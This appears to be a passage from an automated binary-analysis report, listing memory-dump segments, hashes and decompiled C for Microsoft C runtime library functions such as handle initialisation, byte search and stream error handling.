Associated: 00000000.00000002.211853475.00000000000C8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211880599.00000000000CF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211900984.00000000000D0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.212111196.000000000010C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 60065774d39b4de227ebffb5956fe4e836d40b51c3a824d053dc46abda73693a
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: EDC1C47620519349DFAD463AC4348BEBAE55BA27B131A875DD4B2CB5F4EF20C924C720

Uniqueness

Uniqueness Score: -1.00%

Function 000B7F50, Relevance: .1, Instructions: 76
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E000B7F50(signed int _a4, signed char _a8, intOrPtr _a12) {
				intOrPtr _t13;
				void* _t14;
				signed char _t20;
				signed char _t24;
				signed int _t27;
				signed char _t32;
				unsigned int _t33;
				signed char _t35;
				signed char _t37;
				signed int _t39;

				_t13 = _a12;
				if(_t13 == 0) {
					L11:
					return _t13;
				} else {
					_t39 = _a4;
					_t20 = _a8;
					if((_t39 & 0x00000003) == 0) {
						L5:
						_t14 = _t13 - 4;
						if(_t14 < 0) {
							L8:
							_t13 = _t14 + 4;
							if(_t13 == 0) {
								goto L11;
							} else {
								while(1) {
									_t24 =  *_t39;
									_t39 = _t39 + 1;
									if((_t24 ^ _t20) == 0) {
										goto L20;
									}
									_t13 = _t13 - 1;
									if(_t13 != 0) {
										continue;
									} else {
										goto L11;
									}
									goto L24;
								}
								goto L20;
							}
						} else {
							_t20 = ((_t20 << 8) + _t20 << 0x10) + (_t20 << 8) + _t20;
							do {
								_t27 =  *_t39 ^ _t20;
								_t39 = _t39 + 4;
								if(((_t27 ^ 0xffffffff ^ 0x7efefeff + _t27) & 0x81010100) == 0) {
									goto L12;
								} else {
									_t32 =  *(_t39 - 4) ^ _t20;
									if(_t32 == 0) {
										return _t39 - 4;
									} else {
										_t33 = _t32 ^ _t20;
										if(_t33 == 0) {
											return _t39 - 3;
										} else {
											_t35 = _t33 >> 0x00000010 ^ _t20;
											if(_t35 == 0) {
												return _t39 - 2;
											} else {
												if((_t35 ^ _t20) == 0) {
													goto L20;
												} else {
													goto L12;
												}
											}
										}
									}
								}
								goto L24;
								L12:
								_t14 = _t14 - 4;
							} while (_t14 >= 0);
							goto L8;
						}
					} else {
						while(1) {
							_t37 =  *_t39;
							_t39 = _t39 + 1;
							if((_t37 ^ _t20) == 0) {
								break;
							}
							_t13 = _t13 - 1;
							if(_t13 == 0) {
								goto L11;
							} else {
								if((_t39 & 0x00000003) != 0) {
									continue;
								} else {
									goto L5;
								}
							}
							goto L24;
						}
						L20:
						return _t39 - 1;
					}
				}
				L24:
			}

0x000b7f50
0x000b7f57
0x000b7fac
0x000b7fac
0x000b7f59
0x000b7f59
0x000b7f5f
0x000b7f69
0x000b7f81
0x000b7f81
0x000b7f84
0x000b7f98
0x000b7f98
0x000b7f9b
0x00000000
0x000b7f9d
0x000b7f9d
0x000b7f9d
0x000b7f9f
0x000b7fa4
0x00000000
0x00000000
0x000b7fa6
0x000b7fa9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x000b7fa9
0x00000000
0x000b7f9d
0x000b7f86
0x000b7f93
0x000b7fb2
0x000b7fb4
0x000b7fc2
0x000b7fcb
0x00000000
0x000b7fcd
0x000b7fd0
0x000b7fd2
0x000b7ffc
0x000b7fd4
0x000b7fd4
0x000b7fd6
0x000b7ff6
0x000b7fd8
0x000b7fdb
0x000b7fdd
0x000b7ff0
0x000b7fdf
0x000b7fe1
0x00000000
0x000b7fe3
0x00000000
0x000b7fe3
0x000b7fe1
0x000b7fdd
0x000b7fd6
0x000b7fd2
0x00000000
0x000b7fad
0x000b7fad
0x000b7fad
0x00000000
0x000b7f97
0x000b7f6b
0x000b7f6b
0x000b7f6b
0x000b7f6d
0x000b7f72
0x00000000
0x00000000
0x000b7f74
0x000b7f77
0x00000000
0x000b7f79
0x000b7f7f
0x00000000
0x00000000
0x00000000
0x00000000
0x000b7f7f
0x00000000
0x000b7f77
0x000b7fe6
0x000b7fea
0x000b7fea
0x000b7f69
0x00000000

Memory Dump Source

Source File: 00000000.00000002.211771003.00000000000B1000.00000020.00020000.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.211753671.00000000000B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211853475.00000000000C8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211880599.00000000000CF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211900984.00000000000D0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.212111196.000000000010C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: de16c6780f53f63cd42cec488e645b08baef0a38ff0a3ec202c9fa3d62d2fb54
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 22113D7720D14347D694863DD8B8AFBE7F5EBD9320B2C437AE04E8F758D122D945A508

Uniqueness

Uniqueness Score: -1.00%

Function 000D2688, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.211900984.00000000000D0000.00000040.00020000.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.211753671.00000000000B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211771003.00000000000B1000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.211853475.00000000000C8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211880599.00000000000CF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.212111196.000000000010C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db8dc06683c81868e679be673d4ec3fb06fb6b3448f3701d6b23df1c0f66d9f8
Instruction ID: 43f1c3ceeda585a7176137c446a514c9f2a55600008a6ce7a9a9129624059a1b
Opcode Fuzzy Hash: db8dc06683c81868e679be673d4ec3fb06fb6b3448f3701d6b23df1c0f66d9f8
Instruction Fuzzy Hash: 05E01A36264604AFCB54DBA8CC81D59B3E8EB29320B144291FD26C73A1E634EE00AA60

Uniqueness

Uniqueness Score: -1.00%

Function 000D26C5, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.211900984.00000000000D0000.00000040.00020000.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.211753671.00000000000B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211771003.00000000000B1000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.211853475.00000000000C8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211880599.00000000000CF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.212111196.000000000010C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff5f89fbc0ecb4e9f42a23ab0e6ea761649b2aca3cc7db53e6fbbfb3471062a8
Instruction ID: 5a426c32dff1b59bbfd6ed03bd246f8acaddb6e97c707005ffff4629896b8432
Opcode Fuzzy Hash: ff5f89fbc0ecb4e9f42a23ab0e6ea761649b2aca3cc7db53e6fbbfb3471062a8
Instruction Fuzzy Hash: 9DE0DF322103949BCB719A0DD900C82F7E8EFA87B07094462FD4883710C230FC00D7B0

Uniqueness

Uniqueness Score: -1.00%

Function 000D1CC2, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.211900984.00000000000D0000.00000040.00020000.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.211753671.00000000000B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211771003.00000000000B1000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.211853475.00000000000C8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211880599.00000000000CF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.212111196.000000000010C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7398b6239bf8858e3d1776f2ebb5b6e80944bbaad592eaf912553e7d93e1029a
Instruction ID: f8f88f121b540adc9b6d0076a8285c7f1d33d724d002f47c8bf6260fa03b9e85
Opcode Fuzzy Hash: 7398b6239bf8858e3d1776f2ebb5b6e80944bbaad592eaf912553e7d93e1029a
Instruction Fuzzy Hash: 6CB092B06615C05AEB52C3248415B4176E0A740B02F8994E0A00582981C65C8984A200

Uniqueness

Uniqueness Score: -1.00%

Function 000D2728, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.211900984.00000000000D0000.00000040.00020000.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.211753671.00000000000B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211771003.00000000000B1000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.211853475.00000000000C8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211880599.00000000000CF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.212111196.000000000010C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40

Uniqueness

Uniqueness Score: -1.00%

Function 000BB7BA, Relevance: 16.7, APIs: 11, Instructions: 229
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E000BB7BA(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t81;
				void* _t86;
				long _t90;
				intOrPtr _t94;
				signed int _t98;
				signed int _t99;
				signed char _t103;
				intOrPtr* _t105;
				intOrPtr _t106;
				intOrPtr* _t109;
				signed char _t111;
				long _t119;
				signed int _t130;
				signed int* _t134;
				intOrPtr _t135;
				signed int* _t138;
				void** _t139;
				intOrPtr _t141;
				void* _t142;
				signed int _t143;
				void** _t147;
				signed int _t149;
				void* _t150;
				void** _t154;
				void* _t155;

				_push(0x64);
				_push(0xcd4c0);
				E000BAF40(__ebx, __edi, __esi);
				E000B6AC0(0xb);
				_t130 = 0;
				 *(_t155 - 4) = 0;
				if( *0x10a760 == 0) {
					_push(0x40);
					_t141 = 0x20;
					_push(_t141);
					_t81 = E000B7C82();
					_t134 = _t81;
					 *(_t155 - 0x24) = _t134;
					if(_t134 != 0) {
						 *0x10a760 = _t81;
						 *0x10a758 = _t141;
						while(_t134 <  &(_t81[0x200])) {
							_t134[1] = 0xa00;
							 *_t134 =  *_t134 | 0xffffffff;
							_t134[2] = _t130;
							_t134[9] = _t134[9] & 0x00000080;
							_t134[9] = _t134[9] & 0x0000007f;
							_t134[9] = 0xa0a;
							_t134[0xe] = _t130;
							_t134[0xd] = _t130;
							_t134 =  &(_t134[0x10]);
							 *(_t155 - 0x24) = _t134;
							_t81 =  *0x10a760;
						}
						GetStartupInfoW(_t155 - 0x74);
						if( *((short*)(_t155 - 0x42)) == 0) {
							while(1) {
								L31:
								 *(_t155 - 0x2c) = _t130;
								if(_t130 >= 3) {
									break;
								}
								_t147 =  *0x10a760 + (_t130 << 6);
								 *(_t155 - 0x24) = _t147;
								if( *_t147 == 0xffffffff ||  *_t147 == 0xfffffffe) {
									_t147[1] = 0x81;
									if(_t130 != 0) {
										_t66 = _t130 - 1; // -1
										asm("sbb eax, eax");
										_t90 =  ~_t66 + 0xfffffff5;
									} else {
										_t90 = 0xfffffff6;
									}
									_t142 = GetStdHandle(_t90);
									if(_t142 == 0xffffffff || _t142 == 0) {
										L47:
										_t147[1] = _t147[1] | 0x00000040;
										 *_t147 = 0xfffffffe;
										_t94 =  *0x10a874;
										if(_t94 != 0) {
											 *( *((intOrPtr*)(_t94 + _t130 * 4)) + 0x10) = 0xfffffffe;
										}
										goto L49;
									} else {
										_t98 = GetFileType(_t142);
										if(_t98 == 0) {
											goto L47;
										}
										 *_t147 = _t142;
										_t99 = _t98 & 0x000000ff;
										if(_t99 != 2) {
											if(_t99 != 3) {
												L46:
												_t70 =  &(_t147[3]); // -1091412
												InitializeCriticalSectionAndSpinCount(_t70, 0xfa0);
												_t147[2] = _t147[2] + 1;
												goto L49;
											}
											_t103 = _t147[1] | 0x00000008;
											L45:
											_t147[1] = _t103;
											goto L46;
										}
										_t103 = _t147[1] | 0x00000040;
										goto L45;
									}
								} else {
									_t147[1] = _t147[1] | 0x00000080;
									L49:
									_t130 = _t130 + 1;
									continue;
								}
							}
							 *(_t155 - 4) = 0xfffffffe;
							E000BBA7E();
							L2:
							_t86 = 1;
							L3:
							return E000BAF85(_t86);
						}
						_t105 =  *((intOrPtr*)(_t155 - 0x40));
						if(_t105 == 0) {
							goto L31;
						}
						_t135 =  *_t105;
						 *((intOrPtr*)(_t155 - 0x1c)) = _t135;
						_t106 = _t105 + 4;
						 *((intOrPtr*)(_t155 - 0x28)) = _t106;
						 *(_t155 - 0x20) = _t106 + _t135;
						if(_t135 >= 0x800) {
							_t135 = 0x800;
							 *((intOrPtr*)(_t155 - 0x1c)) = 0x800;
						}
						_t149 = 1;
						 *(_t155 - 0x30) = 1;
						while( *0x10a758 < _t135) {
							_t138 = E000B7C82(_t141, 0x40);
							 *(_t155 - 0x24) = _t138;
							if(_t138 != 0) {
								0x10a760[_t149] = _t138;
								 *0x10a758 =  *0x10a758 + _t141;
								while(_t138 <  &(0x10a760[_t149][0x200])) {
									_t138[1] = 0xa00;
									 *_t138 =  *_t138 | 0xffffffff;
									_t138[2] = _t130;
									_t138[9] = _t138[9] & 0x00000080;
									_t138[9] = 0xa0a;
									_t138[0xe] = _t130;
									_t138[0xd] = _t130;
									_t138 =  &(_t138[0x10]);
									 *(_t155 - 0x24) = _t138;
								}
								_t149 = _t149 + 1;
								 *(_t155 - 0x30) = _t149;
								_t135 =  *((intOrPtr*)(_t155 - 0x1c));
								continue;
							}
							_t135 =  *0x10a758;
							 *((intOrPtr*)(_t155 - 0x1c)) = _t135;
							break;
						}
						_t143 = _t130;
						 *(_t155 - 0x2c) = _t143;
						_t109 =  *((intOrPtr*)(_t155 - 0x28));
						_t139 =  *(_t155 - 0x20);
						while(_t143 < _t135) {
							_t150 =  *_t139;
							if(_t150 == 0xffffffff || _t150 == 0xfffffffe) {
								L26:
								_t143 = _t143 + 1;
								 *(_t155 - 0x2c) = _t143;
								_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
								 *((intOrPtr*)(_t155 - 0x28)) = _t109;
								_t139 =  &(_t139[1]);
								 *(_t155 - 0x20) = _t139;
								continue;
							} else {
								_t111 =  *_t109;
								if((_t111 & 0x00000001) == 0) {
									goto L26;
								}
								if((_t111 & 0x00000008) != 0) {
									L24:
									_t154 = 0x10a760[_t143 >> 5] + ((_t143 & 0x0000001f) << 6);
									 *(_t155 - 0x24) = _t154;
									 *_t154 =  *_t139;
									_t154[1] =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
									_t38 =  &(_t154[3]); // 0xd
									InitializeCriticalSectionAndSpinCount(_t38, 0xfa0);
									_t154[2] = _t154[2] + 1;
									_t139 =  *(_t155 - 0x20);
									L25:
									_t135 =  *((intOrPtr*)(_t155 - 0x1c));
									goto L26;
								}
								_t119 = GetFileType(_t150);
								_t139 =  *(_t155 - 0x20);
								if(_t119 == 0) {
									goto L25;
								}
								goto L24;
							}
						}
						goto L31;
					}
					E000C1EE0(_t155, 0xcf9b8, _t155 - 0x10, 0xfffffffe);
					_t86 = 0;
					goto L3;
				}
				E000C1EE0(_t155, 0xcf9b8, _t155 - 0x10, 0xfffffffe);
				goto L2;
			}

0x000bb7ba
0x000bb7bc
0x000bb7c1
0x000bb7c8
0x000bb7ce
0x000bb7d0
0x000bb7d9
0x000bb7f9
0x000bb7fd
0x000bb7fe
0x000bb7ff
0x000bb806
0x000bb808
0x000bb80d
0x000bb826
0x000bb82b
0x000bb831
0x000bb83a
0x000bb840
0x000bb843
0x000bb846
0x000bb84f
0x000bb852
0x000bb858
0x000bb85b
0x000bb85e
0x000bb861
0x000bb864
0x000bb864
0x000bb86f
0x000bb87a
0x000bb9a9
0x000bb9a9
0x000bb9a9
0x000bb9af
0x00000000
0x00000000
0x000bb9ba
0x000bb9c0
0x000bb9c6
0x000bb9db
0x000bb9e1
0x000bb9e8
0x000bb9ed
0x000bb9ef
0x000bb9e3
0x000bb9e5
0x000bb9e5
0x000bb9f9
0x000bb9fe
0x000bba45
0x000bba4b
0x000bba4e
0x000bba54
0x000bba5b
0x000bba60
0x000bba60
0x00000000
0x000bba04
0x000bba05
0x000bba0d
0x00000000
0x00000000
0x000bba0f
0x000bba11
0x000bba19
0x000bba26
0x000bba31
0x000bba36
0x000bba3a
0x000bba40
0x00000000
0x000bba40
0x000bba2c
0x000bba2e
0x000bba2e
0x00000000
0x000bba2e
0x000bba1f
0x00000000
0x000bba1f
0x000bb9cd
0x000bb9d3
0x000bba67
0x000bba67
0x00000000
0x000bba67
0x000bb9c6
0x000bba6d
0x000bba74
0x000bb7ee
0x000bb7f0
0x000bb7f1
0x000bb7f6
0x000bb7f6
0x000bb880
0x000bb885
0x00000000
0x00000000
0x000bb88b
0x000bb88d
0x000bb890
0x000bb893
0x000bb898
0x000bb8a2
0x000bb8a4
0x000bb8a6
0x000bb8a6
0x000bb8ab
0x000bb8ac
0x000bb8af
0x000bb8c1
0x000bb8c3
0x000bb8c8
0x000bb95c
0x000bb963
0x000bb969
0x000bb979
0x000bb97f
0x000bb982
0x000bb985
0x000bb989
0x000bb98f
0x000bb992
0x000bb995
0x000bb998
0x000bb998
0x000bb99d
0x000bb99e
0x000bb9a1
0x00000000
0x000bb9a1
0x000bb8ce
0x000bb8d4
0x00000000
0x000bb8d4
0x000bb8d7
0x000bb8d9
0x000bb8dc
0x000bb8df
0x000bb8e2
0x000bb8ea
0x000bb8ef
0x000bb949
0x000bb949
0x000bb94a
0x000bb950
0x000bb951
0x000bb954
0x000bb957
0x00000000
0x000bb8f6
0x000bb8f6
0x000bb8fa
0x00000000
0x00000000
0x000bb8fe
0x000bb90e
0x000bb91b
0x000bb922
0x000bb927
0x000bb92e
0x000bb936
0x000bb93a
0x000bb940
0x000bb943
0x000bb946
0x000bb946
0x00000000
0x000bb946
0x000bb901
0x000bb907
0x000bb90c
0x00000000
0x00000000
0x00000000
0x000bb90c
0x000bb8ef
0x00000000
0x000bb8e2
0x000bb81a
0x000bb822
0x00000000
0x000bb822
0x000bb7e6
0x00000000

APIs

__lock.LIBCMT ref: 000BB7C8

Part of subcall function 000B6AC0: __mtinitlocknum.LIBCMT ref: 000B6AD2
Part of subcall function 000B6AC0: EnterCriticalSection.KERNEL32(00000000,?,000BAB19,0000000D), ref: 000B6AEB

@_EH4_CallFilterFunc@8.LIBCMT ref: 000BB7E6
__calloc_crt.LIBCMT ref: 000BB7FF
@_EH4_CallFilterFunc@8.LIBCMT ref: 000BB81A
GetStartupInfoW.KERNEL32(?,000CD4C0,00000064), ref: 000BB86F
__calloc_crt.LIBCMT ref: 000BB8BA
GetFileType.KERNEL32(00000001), ref: 000BB901
InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 000BB93A
GetStdHandle.KERNEL32(-000000F6), ref: 000BB9F3
GetFileType.KERNEL32(00000000), ref: 000BBA05
InitializeCriticalSectionAndSpinCount.KERNEL32(-0010A754,00000FA0), ref: 000BBA3A

Memory Dump Source

Source File: 00000000.00000002.211771003.00000000000B1000.00000020.00020000.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.211753671.00000000000B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211853475.00000000000C8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211880599.00000000000CF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211900984.00000000000D0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.212111196.000000000010C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CriticalSection$CallCountFileFilterFunc@8InitializeSpinType__calloc_crt$EnterHandleInfoStartup__lock__mtinitlocknum
String ID:
API String ID: 1456538442-0
Opcode ID: b401abd8cf012018c9242744b93bb0316560b9703105cb9c2dce43cae09ed5ae
Instruction ID: f5efadc0cb30156ed2b27c4f8da39f198248d8766f8330c514c1c17d13ca68af
Opcode Fuzzy Hash: b401abd8cf012018c9242744b93bb0316560b9703105cb9c2dce43cae09ed5ae
Instruction Fuzzy Hash: AC91D171D043458FCB20CF68C8816EDBBF4AF49324B24826ED5A6AB3D1C7B59843CB55

Uniqueness

Uniqueness Score: -1.00%

Function 000B26AC, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E000B26AC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t17;
				void* _t22;
				void* _t39;
				intOrPtr* _t41;
				void* _t44;

				_push(0x14);
				E000B5678(E000C6D8B, __ebx, __edi, __esi);
				E000B3812(_t44 - 0x14, 0);
				_t41 =  *0x108918; // 0x0
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t41;
				_t17 = E000B1270( *((intOrPtr*)(_t44 + 8)), E000B11C0(0x108910));
				_t43 = _t17;
				if(_t17 == 0) {
					if(_t41 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t22 = E000B2A78(__ebx, _t39, _t41, _t43, __eflags);
						__eflags = _t22 - 0xffffffff;
						if(_t22 == 0xffffffff) {
							E000B3C9F(_t44 - 0x20, "bad cast");
							E000B55FA(_t44 - 0x20, 0xcd6f4);
						}
						_t43 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x108918 = _t43;
						 *((intOrPtr*)( *_t43 + 4))();
						E000B245A(_t43);
					} else {
						_t43 = _t41;
					}
				}
				E000B386E(_t44 - 0x14);
				return E000B5655(_t43);
			}

0x000b26ac
0x000b26b3
0x000b26bd
0x000b26c2
0x000b26c8
0x000b26d1
0x000b26dd
0x000b26e2
0x000b26e6
0x000b26ea
0x000b26f0
0x000b26f6
0x000b26f7
0x000b26fe
0x000b2701
0x000b270b
0x000b2719
0x000b2719
0x000b271e
0x000b2721
0x000b272b
0x000b272f
0x000b26ec
0x000b26ec
0x000b26ec
0x000b26ea
0x000b2738
0x000b2744

APIs

__EH_prolog3.LIBCMT ref: 000B26B3
std::_Lockit::_Lockit.LIBCPMT ref: 000B26BD

Part of subcall function 000B3812: __lock.LIBCMT ref: 000B3823

int.LIBCPMT ref: 000B26D4

Part of subcall function 000B11C0: std::_Lockit::_Lockit.LIBCPMT ref: 000B11D1

codecvt.LIBCPMT ref: 000B26F7
std::bad_exception::bad_exception.LIBCMT ref: 000B270B
__CxxThrowException@8.LIBCMT ref: 000B2719
std::_Facet_Register.LIBCPMT ref: 000B272F

Strings

bad cast, xrefs: 000B2703

Memory Dump Source

Source File: 00000000.00000002.211771003.00000000000B1000.00000020.00020000.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.211753671.00000000000B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211853475.00000000000C8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211880599.00000000000CF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211900984.00000000000D0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.212111196.000000000010C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$LockitLockit::_$Exception@8Facet_H_prolog3RegisterThrow__lockcodecvtstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 1512642153-3145022300
Opcode ID: ecb50b2bb46c3cf42222d9d831be19044edef74a4ac991a60f85190a8f546569
Instruction ID: 9379ff8264e36a304119a45e46f946fdbe6972c2a89f97881e30801f89577154
Opcode Fuzzy Hash: ecb50b2bb46c3cf42222d9d831be19044edef74a4ac991a60f85190a8f546569
Instruction Fuzzy Hash: 17010832940A288BCF12EBA4CC42AFE7364AF48311F200008F110BB2E2DF30AE0197D6

Uniqueness

Uniqueness Score: -1.00%

Function 000BE0EB, Relevance: 13.6, APIs: 9, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000BE0EB(void* __eflags, signed int _a4) {
				void* _t12;
				signed int _t13;
				signed int _t16;
				intOrPtr _t18;
				void* _t22;
				signed int _t35;
				long _t40;

				_t13 = E000BB77F(_t12);
				if(_t13 >= 0) {
					_t35 = _a4;
					if(E000C2F89(_t35) == 0xffffffff) {
						L10:
						_t40 = 0;
					} else {
						_t18 =  *0x10a760;
						if(_t35 != 1 || ( *(_t18 + 0x84) & 0x00000001) == 0) {
							if(_t35 != 2 || ( *(_t18 + 0x44) & 0x00000001) == 0) {
								goto L8;
							} else {
								goto L7;
							}
						} else {
							L7:
							_t22 = E000C2F89(2);
							if(E000C2F89(1) == _t22) {
								goto L10;
							} else {
								L8:
								if(CloseHandle(E000C2F89(_t35)) != 0) {
									goto L10;
								} else {
									_t40 = GetLastError();
								}
							}
						}
					}
					E000C2F03(_t35);
					 *((char*)( *((intOrPtr*)(0x10a760 + (_t35 >> 5) * 4)) + ((_t35 & 0x0000001f) << 6) + 4)) = 0;
					if(_t40 == 0) {
						_t16 = 0;
					} else {
						_t16 = E000B4C32(_t40) | 0xffffffff;
					}
					return _t16;
				} else {
					return _t13 | 0xffffffff;
				}
			}

0x000be0ee
0x000be0f5
0x000be0fe
0x000be10b
0x000be15d
0x000be15d
0x000be10d
0x000be10d
0x000be115
0x000be123
0x00000000
0x00000000
0x00000000
0x00000000
0x000be12b
0x000be12b
0x000be12d
0x000be13f
0x00000000
0x000be141
0x000be141
0x000be151
0x00000000
0x000be153
0x000be159
0x000be159
0x000be151
0x000be13f
0x000be115
0x000be160
0x000be178
0x000be17f
0x000be18d
0x000be181
0x000be188
0x000be188
0x000be192
0x000be0f7
0x000be0fb
0x000be0fb

APIs

__ioinit.LIBCMT ref: 000BE0EE

Part of subcall function 000BB77F: InitOnceExecuteOnce.KERNEL32(00109360,000BB7BA,00000000,00000000,000B61E5,000CD1D0,0000000C,000B265D,?), ref: 000BB78D

__get_osfhandle.LIBCMT ref: 000BE102
__get_osfhandle.LIBCMT ref: 000BE12D
__get_osfhandle.LIBCMT ref: 000BE136
__get_osfhandle.LIBCMT ref: 000BE142
CloseHandle.KERNEL32(00000000,?,?,?,000BE096,?,000CD5D8,00000010,000B5F1D,00000000,?,?,?,?,?), ref: 000BE149
GetLastError.KERNEL32(?,000BE096,?,000CD5D8,00000010,000B5F1D,00000000,?,?,?,?,?,?,000B5F9B,?,000CD168), ref: 000BE153
__free_osfhnd.LIBCMT ref: 000BE160
__dosmaperr.LIBCMT ref: 000BE182

Memory Dump Source

Source File: 00000000.00000002.211771003.00000000000B1000.00000020.00020000.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.211753671.00000000000B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211853475.00000000000C8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211880599.00000000000CF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211900984.00000000000D0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.212111196.000000000010C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __get_osfhandle$Once$CloseErrorExecuteHandleInitLast__dosmaperr__free_osfhnd__ioinit
String ID:
API String ID: 974577687-0
Opcode ID: 868a52981007def94d98460092ef65ba003a5f3d4f631b39fe4ccc38775dec18
Instruction ID: 0b9caa15aaffff498bd577889cb2c91c9599f504cfb54ce4393e24cb1415cebc
Opcode Fuzzy Hash: 868a52981007def94d98460092ef65ba003a5f3d4f631b39fe4ccc38775dec18
Instruction Fuzzy Hash: AD11593260516415D660673CE946BFE77D94F82774F35472CF9188A2C3DE74D8824290

Uniqueness

Uniqueness Score: -1.00%

Function 000B17A0, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 61COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 000B17EE
__CxxThrowException@8.LIBCMT ref: 000B180B
__CxxThrowException@8.LIBCMT ref: 000B1824
__CxxThrowException@8.LIBCMT ref: 000B183D

Strings

ios_base::badbit set, xrefs: 000B17F3
ios_base::failbit set, xrefs: 000B1810
